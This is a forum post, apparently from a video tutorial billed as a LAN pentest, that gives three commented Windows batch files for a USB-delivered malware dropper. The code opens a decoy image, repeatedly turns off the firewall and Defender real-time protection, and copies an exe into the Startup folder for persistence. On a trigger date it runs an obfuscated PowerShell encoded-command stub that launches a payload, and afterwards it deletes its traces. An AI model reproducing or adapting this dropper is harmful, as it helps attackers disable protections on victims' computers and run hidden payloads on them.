23. Lan Pentest Preparing Payload With Windows 7
----
Lan & Wlan Pentests, A Closer look at preparing the Payloads, 3 Bat Files Commands are explained within the video.
af.bat Contents & Rem comments Explaination of Commands.
=*=
- Code:
@echo off
Rem Turns off Echo
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
Rem starts command prompt in minimized mode,
Rem this command probably isn't necessary,
Rem since we will make the entire thing invisible later
Rem but why not?
taskkill /im f1.exe /f
Rem kill process f1.exe forcefully.
timeout /t 01 > nul
Rem waits 1 second, without printing anything with nul.
start "" "%appdata%\zombie.png"
Rem starts a program or file, in this case a picture.
netsh advfirewall set allprofiles state off 2> nul
Rem sets Windows 10 firewall to off if this
Rem Program is ran in Administrator Mode.
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
Rem Disable Window's Defender Realtime Protection
timeout /t 10 > nul
Rem waits 10 seconds, repeat.
Rem If the program is not ran as administrator
Rem This portion will just print an error, but
Rem since it's set to Nul, it shouldn't print anything.
Rem Besides, we will make this entire thing invisible
Rem so nothing seems to matters, it's just extra notes.
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
Rem After approximately 1 minute and 40 seconds of
Rem Repeatedly disabling protection
"%appdata%\f1.exe" 2> nul
Rem Starts "f1.exe" silently from within this actual
Rem Command Prompt Window.
Rem there is no start command before it,
Rem so this program is done running from this point
Rem and it should not be able to run any commands below
Rem this point.
exit
Rem just incase it did run anything else,
Rem it will exit itself.
f1.bat Contents & Rem comments Explaination of Commands.
=*=
- Code:
@echo off
taskkill /im powershell.exe /f 2> nul
Rem turns echo off, kills payload's
Rem process, powershell.exe if it's running.
timeout /t 02
Rem waits 2 seconds
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
Rem Moves f.exe to the User's startup's folder.
:Begin
Rem Beginning Block
set t=%date:~4,5%
Rem Set's the variable "t" to the current date of the pc
if "%t%"=="03/02" goto :A
Rem if the date matches 3 month and 2 day goto block A.
if not "%t%"=="03/02" goto :B
Rem if doesn't match 3 month and 2 day goto block B.
timeout /t 02 > nul
Rem Waits 2 seconds
:A
Rem Beginning of Block A.
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
Rem start Payload.
:B
Rem Beginning of Block B.
timeout /t 05
Rem Waits 5 seconds.
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
Rem starts f.exe
timeout /t 05
Rem Waits 5 seconds, program will exit itself after
Rem Completing all commands.
[/b][/size][/color]
[color=#000000][size=16][b][color=#0000FF]f.bat[/color] Contents & Rem comments Explaination of Commands.
=*=[/b][/size][/color]
[color=#000000][size=16][b]Rem Turns echo off.
taskkill /im f1.exe /f 2> nul
Rem kills the process f1.exe forcefully, to nul
Rem so it doesn't print anything when it kills it.
taskkill /im powershell.exe /f
Rem kills powershell.exe forcefully.
timeout /t 04 > nul
Rem waits 4 seconds.
del "%appdata%\f1.exe" /q /s /f 2> nul
Rem deletes f1.exe which is the payload .exe
I prefer to use Windows 7 vs. Windows 10 to prepare the Payload.
1. Search windows for Microsoft Security Essentials (That's my Virus Protector within the video.) Set your real-time protection to Off.
2. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = Open the Command Prompt, enter the follwing command which will kill your gui explorer, kill Microsoft security essentials process, then restart your gui file explorer.
3. Plug in your Usb stick with the Payload on it.
4. I have the 3 .bat files code contents in this forum post, under the "code" sections, find the 3 .bat files I use in the video, then follow the instructions within the video carefully. Below are each of the .bat file contents, and the names I named it within the video.
5. You will need your own payload, your own icon file, and your own zombie.PNG image in order to use the below files for a Pentest on your own machine.
6. Keep in mind for the exe files that I created, the 1 exe that runs for administrator is for Windows 10, and the one that runs without administrator priviledges is for Windows 7.
af.bat file contents This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe, it will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems, this will not work however for 32-bit windows 7 systems.
=*=
- Code:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im f1.exe /f
timeout /t 01 > nul
start "" "%appdata%\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
"%appdata%\f1.exe" 2> nul
exit
f1.bat file contents This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the A: BLOCK of text.
=*=
- Code:
@echo off
taskkill /im powershell.exe /f 2> nul
timeout /t 02
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
:Begin
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
if not "%t%"=="03/02" goto :B
timeout /t 02 > nul
:A
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
:B
timeout /t 05
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
timeout /t 05
f.bat file contents This bat file tells windows to remove the f1.exe file whenever the user restarts the computer.
=*=
- Code:
@echo off
taskkill /im f1.exe /f 2> nul
taskkill /im powershell.exe /f
timeout /t 04 > nul
del "%appdata%\f1.exe" /q /s /f 2> nul